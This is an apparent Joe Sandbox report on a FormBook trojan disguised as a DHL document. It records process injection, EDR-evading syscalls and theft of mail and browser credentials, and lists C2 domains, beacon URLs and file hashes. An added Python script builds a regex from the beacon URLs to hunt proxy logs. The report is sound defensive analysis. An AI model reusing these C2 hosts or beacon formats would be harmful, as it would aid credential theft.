Network (sample level): www.joyesi.xyz, www.shenzhoucui.com and 18 other IPs or domains; Performs DNS queries to domains with low reputation
Signatures (sample level): Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures

DHL 0737-12182024.exe (started)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        Signatures: Maps a DLL or memory area into another process
        -> MPhqOtiHUlL.exe (injected)
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> netbtugc.exe (started)
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> MPhqOtiHUlL.exe (injected)
                    Network: www.rssnewscast.com 91.195.240.94, ports 49985, 49986, 49987 (SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133, ports 49993, 49994, 49995 (REGISTER-ASIT, Italy); 5 other IPs or domains
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
DHL 0737-12182024.exe | 58% | ReversingLabs | Win32.Trojan.AutoitInject |
DHL 0737-12182024.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | 100% | Avira URL Cloud | malware |
https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR | 0% | Avira URL Cloud | safe |
http://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL | 0% | Avira URL Cloud | safe |
http://www.3xfootball.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | 0% | Avira URL Cloud | safe |
http://www.magmadokum.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | 0% | Avira URL Cloud | safe |
http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | 100% | Avira URL Cloud | malware |
http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL | 100% | Avira URL Cloud | malware |
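Every C2 URL in the table shares the path /fo8o/ and the same sLRH=86fTArmPbL parameter, while the UT5tTdKX value changes per request and the host rotates across the domains the sample resolved. The Python below is an added example, not part of the Joe Sandbox report: it derives that fingerprint from the report's own URLs and applies it to proxy log lines. The log format and the host example-host.test are constructed for the example; the four URLs are copied from the table.

```python
"""Derive a host-agnostic hunting pattern from the C2 URLs the report lists.
Added example, not part of the Joe Sandbox report; the proxy log lines and
the host example-host.test are constructed for the demonstration."""
import re
from urllib.parse import urlsplit, parse_qsl

# C2 URLs copied verbatim from the report's URL table.
REPORT_URLS = [
    "http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==",
    "http://www.3xfootball.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==",
    "http://www.magmadokum.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==",
    "http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL",
]


def fingerprint(urls):
    """Return (common_path, constant_params, varying_param_names).

    constant_params holds query parameters whose value is identical in every
    URL; varying_param_names lists those whose value changes per request."""
    paths = set()
    seen = {}  # parameter name -> set of values observed across the URLs
    for url in urls:
        parts = urlsplit(url)
        paths.add(parts.path)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            seen.setdefault(name, set()).add(value)
    if len(paths) != 1:
        raise ValueError(f"no single common path: {sorted(paths)}")
    constant = {n: next(iter(v)) for n, v in seen.items() if len(v) == 1}
    varying = sorted(n for n, v in seen.items() if len(v) > 1)
    return paths.pop(), constant, varying


def build_regex(path, constant):
    """Regex for URL/proxy logs: any host, the exact path, and every constant
    parameter present with its exact value at any position in the query."""
    lookaheads = "".join(
        rf"(?=\?(?:\S*&)?{re.escape(n)}={re.escape(v)}(?:&|\s|$))"
        for n, v in sorted(constant.items())
    )
    return re.compile(rf"https?://[^/\s]+{re.escape(path)}{lookaheads}\?\S*", re.IGNORECASE)


def hunt(log_text, pattern):
    """Return the log lines whose URL matches the fingerprint."""
    return [line for line in log_text.splitlines() if pattern.search(line)]


def hosts(urls):
    """Hostnames seen in the URLs, for a complementary (weaker) blocklist."""
    return sorted({urlsplit(u).hostname for u in urls})


# Constructed proxy log lines (not from the report): a beacon to a host the
# sandbox never saw, the same path with a wrong sLRH value, a benign request,
# and a beacon with the parameters in the other order.
SAMPLE_LOG = """\
2024-12-19T07:52:01Z 10.0.0.5 GET http://www.example-host.test/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=AAAA 200
2024-12-19T07:52:02Z 10.0.0.5 GET http://www.example-host.test/fo8o/?sLRH=zzzz&UT5tTdKX=AAAA 200
2024-12-19T07:52:03Z 10.0.0.5 GET https://www.ecosia.org/newtab/ 200
2024-12-19T07:52:04Z 10.0.0.6 GET http://www.rssnewscast.com/fo8o/?UT5tTdKX=BBBB&sLRH=86fTArmPbL 404
"""

if __name__ == "__main__":
    path, constant, varying = fingerprint(REPORT_URLS)
    rx = build_regex(path, constant)
    print("path:", path, "| constant:", constant, "| varying:", varying)
    print("regex:", rx.pattern)
    print("hosts:", hosts(REPORT_URLS))
    for line in hunt(SAMPLE_LOG, rx):
        print("HIT", line)
```

Hunting on the path plus the constant parameter catches beacons to hosts the sandbox never contacted, which a blocklist of the seven resolved IPs cannot do; the lookahead is what lets the rule accept both parameter orders the report shows. The 404 on the last sample line is deliberate: parked or dead C2 domains still answer, and the request itself is the indicator.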
Name | IP | Active | Malicious | Antivirus Detection | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | - | high
empowermedeco.com | 217.196.55.202 | true | false | - | high
www.3xfootball.com | 154.215.72.110 | true | false | - | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | - | high
www.rssnewscast.com | 91.195.240.94 | true | false | - | high
www.techchains.info | 66.29.149.46 | true | false | - | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | - | high
www.magmadokum.com | unknown | unknown | false | - | high
www.donnavariedades.com | unknown | unknown | false | - | high
www.660danm.top | unknown | unknown | false | - | high
www.joyesi.xyz | unknown | unknown | false | - | high
www.liangyuen528.com | unknown | unknown | false | - | high
www.kasegitai.tokyo | unknown | unknown | false | - | high
www.empowermedeco.com | unknown | unknown | false | - | high
www.k9vyp11no3.cfd | unknown | unknown | false | - | high
www.elettrosistemista.zip | unknown | unknown | false | - | high
www.shenzhoucui.com | unknown | unknown | true | - | unknown
www.antonio-vivaldi.mobi | unknown | unknown | false | - | high
www.b301.space | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.empowermedeco.com/fo8o/ | false | - | high
http://www.magmadokum.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/ | false | - | high
http://www.3xfootball.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | true | Avira URL Cloud: safe | unknown
http://www.magmadokum.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/ | false | - | high
http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | false | - | high
http://www.techchains.info/fo8o/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | MPhqOtiHUlL.exe, 00000006.00000002.4526783594.0000000004F20000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR | netbtugc.exe, 00000004.00000002.4525505296.000000000501A000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003F9A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.4527522560.0000000006510000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4525505296.00000000046AE000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1578024
                                                                                          Start date and time:2024-12-19 07:49:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 41s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:DHL 0737-12182024.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@18/7
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 85%
                                                                                          • Number of executed functions: 43
                                                                                          • Number of non-executed functions: 302
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: DHL 0737-12182024.exe
Time | Type | Description
01:50:55 | API Interceptor | 10898023x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
91.195.240.94 | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | 236236236.elf | Get hash | malicious | Unknown | Browse
• suboyule.736t.com/
 | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
 | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
• www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | Get hash | malicious | FormBook | Browse
• www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
 | N2sgk6jMa2.exe | Get hash | malicious | FormBook | Browse
• www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
 | Document 151-512024.exe | Get hash | malicious | FormBook | Browse
• www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.3xfootball.com | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | Certificate 20156-2024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
 | http://93287.mobi | Get hash | malicious | Unknown | Browse
• 154.203.26.164
 | la.bot.powerpc.elf | Get hash | malicious | Mirai | Browse
• 156.253.231.231
 | loligang.mips.elf | Get hash | malicious | Mirai | Browse
• 156.227.181.218
 | 2.elf | Get hash | malicious | Unknown | Browse
• 156.242.243.23
 | sh4.elf | Get hash | malicious | Unknown | Browse
• 45.202.220.151
 | armv4l.elf | Get hash | malicious | Mirai | Browse
• 154.201.227.218
 | rebirth.arm.elf | Get hash | malicious | Mirai, Okiru | Browse
• 160.124.155.145
 | rebirth.spc.elf | Get hash | malicious | Mirai, Okiru | Browse
• 154.89.221.223
 | elitebotnet.arm7.elf | Get hash | malicious | Mirai, Okiru | Browse
• 156.242.21.125
REGISTER-ASIT | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | SRT68.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 195.110.124.133
 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
• 195.110.124.133
 | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 195.110.124.133
 | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 195.110.124.133
SEDO-ASDE | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | 236236236.elf | Get hash | malicious | Unknown | Browse
• 91.195.240.94
 | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
 | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
• 91.195.240.94
                                                                                          No context
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Process:C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):270848
                                                                                          Entropy (8bit):7.993222502483216
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:lwSNghIc0omqX2fXDyg04ZKISzWP7vVhmx1U51sVItQne:li90lbXDyT4ZKISzWD771sVIane
                                                                                          MD5:630CC920541B9544B4AB80EEDE64BD77
                                                                                          SHA1:8AA023221C064E5229FC31F95122EE56A9D8CBEF
                                                                                          SHA-256:D868E48718295F6C6C4D97C65583F4F6188B5977590CD32B6DBB06C6C5B3D305
                                                                                          SHA-512:EC2F71225360BB6A7D2225473941BD577BBC75DEEF8865CCAC2D80CBF97D59CA23011A884753490952F29E244DBA503FDEEA65ED23946D8C039C7C87C6CA49E8
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.139385154790074
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:DHL 0737-12182024.exe
                                                                                          File size:1'254'400 bytes
                                                                                          MD5:ec3ba2f9b2d0b8236ac14326f17c2512
                                                                                          SHA1:83868d22c1f3437a6ebc5cda29ad0d8cb75c43a6
                                                                                          SHA256:15bb7ea4eaf34d92908626f1f1898e3bdc5a19fd086df4808a590c00c7285d74
                                                                                          SHA512:464dc47cca0d3eced6c57bb65d1b8a2c11dcc28103ba451aac355113e118ee4594ea1fa5c68abf7a0bc3aa85c6fc397d1939e7ef332d9a6937565d91a1239963
                                                                                          SSDEEP:24576:1qDEvCTbMWu7rQYlBQcBiT6rprG8ais1ZIVWiroV11CzhT6XtWI:1TvC/MTQYxsWR7ai7W3V12dc
                                                                                          TLSH:4145C00273C1D022FF9B92334B5AF6515BBC69260123E61F13981DBABE705B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67635C90 [Wed Dec 18 23:36:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
Instruction
call 00007FAC491C5463h
jmp 00007FAC491C4D6Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FAC491C4F4Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FAC491C4F1Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FAC491C7B0Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FAC491C7B58h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FAC491C7B41h
test byte ptr [ebp+08h], 00000001h
pop ecx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5b8cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
